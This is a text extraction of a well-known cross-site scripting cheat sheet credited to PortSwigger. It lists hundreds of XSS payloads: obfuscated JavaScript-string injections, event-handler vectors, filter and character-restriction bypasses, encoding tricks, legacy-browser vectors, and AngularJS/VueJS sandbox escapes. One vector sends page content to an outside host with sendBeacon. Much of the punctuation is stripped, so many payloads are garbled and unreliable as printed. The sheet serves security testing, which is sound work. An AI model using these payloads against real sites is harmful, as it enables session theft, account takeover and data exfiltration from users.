window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
onmouseup
Triggered when the mouse button isreleased
ltxss onmouseup=alert(1)gttestltxssgtCompatibility
onmousewheel
Fires when the mousewheel scrolls ltxss onmousewheel=alert(1)gtrequires scrollingCompatibility
onmozfullscreenchange
Fires when a video changes full screenstatus
ltvideo onmozfullscreenchange=alert(1) src=validvideomp4 controlsgtCompatibility
onpagehide
Fires when the page is changed ltbody onpagehide=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt
Compatibility
onpaste
Requires you paste a piece of text lta onpaste=alert(1) contenteditablegttestltagtCompatibility
onpause
Requires clicking the element to pause ltaudio autoplay controls onpause=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onpointerdown
Fires when the mouse down ltxss onpointerdown=alert(1)gtXSSltxssgtCompatibility
onpointerenter
Fires when the mouseenter ltxss onpointerenter=alert(1)gtXSSltxssgtCompatibility
onpointerleave
Fires when the mouseleave ltxss onpointerleave=alert(1)gtXSSltxssgtCompatibility
onpointermove
Fires when the mouse move ltxss onpointermove=alert(1)gtXSSltxssgtCompatibility
onpointerout
Fires when the mouse out ltxss onpointerout=alert(1)gtXSSltxssgtCompatibility
onpointerover
Fires when the mouseover ltxss onpointerover=alert(1)gtXSSltxssgtCompatibility
onpointerrawupdate
Fires when the pointer changes ltxss onpointerrawupdate=alert(1)gtXSSltxssgtCompatibility
onpointerup
Fires when the mouse up ltxss onpointerup=alert(1)gtXSSltxssgtCompatibility
onreset
Requires a click ltform onreset=alert(1)gtltinput type=resetgtCompatibility
onsearch
Fires when a form is submitted and theinput has a type attribute of search
ltformgtltinput type=search onsearch=alert(1) value=Hit return autofocusgtCompatibility
onseeked
Requires clicking the element timeline ltaudio autoplay controls onseeked=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onseeking
Requires clicking the element timeline ltaudio autoplay controls onseeking=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onselect
Requires you select text ltinput onselect=alert(1) value=XSS autofocusgtCompatibility
onselectionchange
Fires when text selection is changed onthe page
ltbody onselectionchange=alert(1)gtselect some textCompatibility
onselectstart
Fires when beginning a text selection ltbody onselectstart=alert(1)gtselect some textCompatibility
onshow
Fires context menu is shown ltdiv contextmenu=xssgtltpgtRight clickltmenu type=context id=xss onshow=alert(1)gtltmenugtltdivgt
Compatibility
onsubmit
Requires a form submission ltform onsubmit=alert(1)gtltinput type=submitgtCompatibility
ontouchend
Fires when the touch screen only mobiledevice
ltbody ontouchend=alert(1)gt Compatibility
ontouchmove
Fires when the touch screen and moveonly mobile device
ltbody ontouchmove=alert(1)gt Compatibility
ontouchstart
Fires when the touch screen only mobiledevice
ltbody ontouchstart=alert(1)gt Compatibility
onvolumechange
Requires volume adjustment ltaudio autoplay controls onvolumechange=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onwheel
Fires when you use the mouse wheel ltbody onwheel=alert(1)gtCompatibility
Restricted characters
No parentheses using exception handling ltscriptgtonerror=alertthrow 1ltscriptgt
No parentheses using exception handling no semicolons
ltscriptgtonerror=alertthrow 1ltscriptgt
No parentheses using exception handling no semicolons using expressions
ltscriptgtthrow onerror=alert1ltscriptgt
No parentheses using exception handling and eval ltscriptgtthrow onerror=eval=alertx281x29ltscriptgt
No parentheses using exception handling and evalon Firefox
ltscriptgtonerror=evalthrowlineNumber1columnNumber1fileName1messagealertx281x29ltscriptgt
No parentheses using ES6 hasInstance andinstanceof with eval
ltscriptgtalertx281x29instanceof[SymbolhasInstance]evalltscriptgt
No parentheses using ES6 hasInstance andinstanceof with eval without
ltscriptgtalertx281x29instanceof[Symbol[hasInstance]]evalltscriptgt
No parentheses using location redirect ltscriptgtlocation=javascriptalertx281x29ltscriptgt
No parentheses using location redirect no strings ltscriptgtlocation=nameltscriptgt
No parentheses using template strings ltscriptgtalert`1`ltscriptgt
No parentheses using template strings and locationhash
ltscriptgtnew Function`X$documentlocationhashsubstr`1``ltscriptgt
No parentheses or spaces using template stringsand location hash
ltscriptgtFunction`X$documentlocationhashsubstr`1````ltscriptgt
Frameworks
Bootstrap onanimationstart event ltxss class=progress-bar-animated onanimationstart=alert(1)gt
Bootstrap ontransitionend event ltxss class=carousel slide data-ride=carousel data-interval=100 ontransitionend=alert(1)gtltxss class=carousel-innergtltxss class=carousel-item activegtltxssgtltxss class=carousel-itemgtltxssgtltxssgtltxssgt
Protocols
Iframe src attribute JavaScript protocol ltiframe src=javascriptalert(1)gt
Object data attribute with JavaScript protocol ltobject data=javascriptalert(1)gt
Embed src attribute with JavaScript protocol ltembed src=javascriptalert(1)gt
A standard JavaScript protocol lta href=javascriptalert(1)gtXSSltagt
The protocol is not case sensitive lta href=JaVaScriptalert(1)gtXSSltagt
Characters x01-x20 are allowed before the protocol lta href= javascriptalert(1)gtXSSltagt
Characters x09x0ax0d are allowed inside theprotocol
lta href=javas criptalert(1)gtXSSltagt
Characters x09x0ax0d are allowed after protocolname before the colon
lta href=javascript alert(1)gtXSSltagt
Xlink namespace inside SVG with JavaScriptprotocol
ltsvggtlta xlinkhref=javascriptalert(1)gtlttext x=20 y=20gtXSSlttextgtltagt
SVG animate tag using values ltsvggtltanimate xlinkhref=xss attributeName=href values=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
SVG animate tag using to ltsvggtltanimate xlinkhref=xss attributeName=href from=javascriptalert(1) to=1 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
to 1 a id xss text x 20 y 20 XSS text a
SVG set tag ltsvggtltset xlinkhref=xss attributeName=href from= to=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Data protocol inside script src ltscript src=datatextjavascriptalert(1)gtltscriptgt
SVG script href attribute without closing script tag ltsvggtltscript href=datatextjavascriptalert(1) gt
SVG use element ChromeFirefox ltsvggtltuse href=dataimagesvg+xmlltsvg id=x xmlns=httpwwww3org2000svg xmlnsxlink=httpwwww3org1999xlink width=100 height=100gtlta xlinkhref=javascriptalert(1)gtltrect x=0 y=0 width=100 height=100 gtltagtltsvggtxgtltusegtltsvggt
Import statement with data URL ltscriptgtimport(datatextjavascriptalert(1))ltscriptgt
Base tag with JavaScript protocol rewriting relativeURLS
ltbase href=javascripta-alert(1)gtlta href=lolsafarihtmlgttestltagt
MathML makes any tag clickable ltmathgtltx href=javascriptalert(1)gtblah
Button and formaction ltformgtltbutton formaction=javascriptalert(1)gtXSS
Input and formaction ltformgtltinput type=submit formaction=javascriptalert(1) value=XSSgt
Form and action ltform action=javascriptalert(1)gtltinput type=submit value=XSSgt
Use element with an external URL ltsvggtltuse href=subdomain1portswigger-labsnetuse_elementuploadphpx gtltsvggt
Animate tag with keytimes and multiple values ltsvggtltanimate xlinkhref=xss attributeName=href dur=5s repeatCount=indefinite keytimes=001 values=httpsportswiggernetampsemijavascriptalert(1)ampsemi0 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Other useful attributes
Using srcdoc attribute ltiframe srcdoc=ltimg src=1 onerror=alert(1)gtgtltiframegt
Using srcdoc with entities ltiframe srcdoc=ampltimg src=1 onerror=alert(1)ampgtgtltiframegt
Click a submit element from anywhere on the pageeven outside the form
ltform action=javascriptalert(1)gtltinput type=submit id=xgtltformgtltlabel for=xgtXSSltlabelgt
Hidden inputs Access key attributes can enableXSS on normally unexploitable elements
ltinput type=hidden accesskey=X onclick=alert(1)gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Link elements Access key attributes can enableXSS on normally unexploitable elements
ltlink rel=canonical accesskey=X onclick=alert(1) gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Download attribute can save a copy of the currentwebpage
lta href= download=filenamehtmlgtTestltagt
Disable referrer using referrerpolicy ltimg referrerpolicy=no-referrer src=portswigger-labsnetgt
Set windowname via parameter on the windowopenfunction
lta href= onclick=windowopen(httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)alert(1))gtXSSltagt
Set windowname via name attribute in a ltiframegt ltiframe name=alert(1) src=httpsportswigger-labsnetxssxssphp
Set do a e a a e att bute a a e
tagcontext=js_string_singleampx=27eval(name)gtltiframegt
Set windowname via target attribute in a ltbasegt tag ltbase target=alert(1)gtlta href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in base tagltagt
Set windowname via target attribute in a ltagt tag lta target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in a tagltagt
Set windowname via usemap attribute in a ltimggttag
ltimg src=validimagepng width=10 height=10 usemap=xssgtltmap name=xssgtltarea shape=rect coords=0082126 target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtltmapgt
Set windowname via target attribute in a ltformgt tag ltform action=httpsubdomain1portswigger-labsnetxssxssphp target=alert(1)gtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit value=XSS via target in a formgtltformgt
Set windowname via formtarget attribute in altinputgt tag type submit
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type submitgtltformgt
Set windowname via formtarget attribute in altinputgt tag type image
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput name=1 type=image src=validimagepng formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type imagegtltformgt
Special tags
Redirect to a different domain ltmeta http-equiv=refresh content=0 url=portswigger-labsnetgt
Meta charset attribute UTF-7 ltmeta charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
Meta charset UTF-7 ltmeta http-equiv=Content-Type content=texthtml charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 1
+v8 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 2
+v9 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 3
+v+ +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 4
+v +ADw-script+AD4-alert(1)+ADw-script+AD4-
Upgrade insecure requests ltmeta http-equiv=Content-Security-Policy content=upgrade-insecure-requestsgt
Disable JavaScript via iframe sandbox ltiframe sandbox src=portswigger-labsnetgtltiframegt
Disable referer ltmeta name=referrer content=no-referrergt
Encoding
Overlong UTF-8 C0BCscriptgtalert(1)ltscriptgt E080BCscriptgtalert(1)ltscriptgt F08080BCscriptgtalert(1)ltscriptgt F8808080BCscriptgtalert(1)ltscriptgt FC80808080BCscriptgtalert(1)ltscriptgt
Unicode escapes ltscriptgtu0061lert(1)ltscriptgt
Unicode escapes ES6 style ltscriptgtu61lert(1)ltscriptgt
Unicode escapes ES6 style zero padded ltscriptgtu0000000061lert(1)ltscriptgt
Hex encoding JavaScript escapes ltscriptgteval(x61lert(1))ltscriptgt
Octal encoding ltscriptgteval(141lert(1))ltscriptgt ltscriptgteval(alert(061))ltscriptgt ltscriptgteval(alert(61))ltscriptgt
Decimal encoding with optional semi-colon lta href=amp106avascriptalert(1)gtXSSltagtlta href=amp106avascriptalert(1)gtXSSltagt
SVG script with HTML encoding ltsvggtltscriptgtamp97lert(1)ltscriptgtltsvggt ltsvggtltscriptgtampx61lert(1)ltscriptgtltsvggt ltsvggtltscriptgtalertampNewLine(1)ltscriptgtltsvggt ltsvggtltscriptgtx=ampquotalert(1)ltscriptgtltsvggt
Decimal encoding with padded zeros lta href=amp0000106avascriptalert(1)gtXSSltagt
Hex encoding entities lta href=ampx6aavascriptalert(1)gtXSSltagt
Hex encoding without semi-colon provided nextcharacter is not a-f0-9
lta href=jampx61vascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt
Hex encoding with padded zeros lta href=ampx0000006aavascriptalert(1)gtXSSltagt
Hex encoding is not case sensitive lta href=ampX6Aavascriptalert(1)gtXSSltagt
HTML entities lta href=javascriptampcolonalert(1)gtXSSltagt lta href=javaampTabscriptalert(1)gtXSSltagt lta href=javaampNewLinescriptalert(1)gtXSSltagt lta href=javascriptampcolonalertamplpar1amprpargtXSSltagt
URL encoding lta href=javascriptx=27-alert(1)-27gtXSSltagt
HTML entities and URL encoding lta href=javascriptx=amppercnt27-alert(1)-27gtXSSltagt
Obfuscation
Data protocol inside script src with base64 ltscript src=datatextjavascriptbase64YWxlcnQoMSk=gtltscriptgt
Data protocol inside script src with base64 andHTML entities
ltscript src=datatextjavascriptbase64ampx59ampx57ampx78ampx6campx63ampx6eampx51ampx6fampx4dampx53ampx6bampx3dgtltscriptgt
Data protocol inside script src with base64 and URLencoding
ltscript src=datatextjavascriptbase645957786c636e516f4d536b3dgtltscriptgt
Iframe srcdoc HTML encoded ltiframe srcdoc=ampltscriptampgtalertamplpar1amprparampltampsolscriptampgtgtltiframegt
Iframe JavaScript URL with HTML and URL encoding ltiframe src=javascriptampx25ampx33ampx43ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45ampx61ampx6campx65ampx72ampx74ampx28ampx31ampx29ampx25ampx33ampx43ampx25ampx32ampx46ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45gtltiframegt
SVG script with unicode escapes and HTMLencoding
ltsvggtltscriptgtampx5campx75ampx30ampx30ampx36ampx31ampx5campx75ampx30ampx30ampx36ampx63ampx5campx75ampx30ampx30ampx36ampx35ampx5campx75ampx30ampx30ampx37ampx32ampx5campx75ampx30ampx30ampx37ampx34(1)ltscriptgtltsvggt
Client-side template injection
VueJS reflected
Version Author Length Vector
All versions Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
All versions Mario Heiderich (Cure53) ampSebastian Lekies (Google)Eduardo Vela Nava (Google)Krzysztof Kotowicz (Google)
62 ltdiv v-html=constructorconstructor(alert(1))()gtaltdivgt
All versions Gareth Heyes (PortSwigger) 39 ltx v-html=_cconstructor(alert(1))()gt
All versions Peter af Geijerstam (SwedishShellcode Factory)
37 ltx v-if=_cconstructor(alert(1))()gt
AngularJS sandbox escapes reflected
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
101 - 115(shorter)
Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
120 - 121 Jan Horn (Google) 122 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
122 - 125 Gareth Heyes (PortSwigger) 23 )))alert(1)
126 - 1218 Jan Horn (Google) 106 (_=sub)callcall([$=constructor]getOwnPropertyDescriptor(___proto__$)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 124 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1229 Gareth Heyes (PortSwigger) 23 )))alert(1)
1227-1229130-1320
Gareth Heyes (PortSwigger) 23 )))alert(1)
130 Gaacutebor Molnaacuter (Google) 272 ready ampamp (ready = true) ampamp ( call $$watchers[0]get(toStringconstructorprototype) (a = apply) ampamp (apply = constructor) ampamp (valueOf = call) ampamp (+toString( F = Functionprototype + Fapply = Fa + delete Fa + delete FvalueOf + alert(1) )))
133 - 1318 Gareth Heyes (PortSwigger) 128 [toString[]joinlength10__proto__]assign=[]joinaconstructorprototypecharAt=
[]join$eval(x=alert(1))
1319 Gareth Heyes (PortSwigger) 102 a[toStringfalsevalueOf[]joinlength10__proto__]charAt=[]join$eval(x=alert(1))
1320 Gareth Heyes (PortSwigger) 65 aconstructorprototypecharAt=[]join$eval(x=alert(1))
140 - 149 Gareth Heyes (PortSwigger) 74 aconstructorprototypecharAt=[]join$eval(x=1 alert(1))
150 - 158 Ian Hickey amp Gareth Heyes(PortSwigger)
79 x=yconstructorprototypex[y]charAt=[]join$eval(x=alert(1))
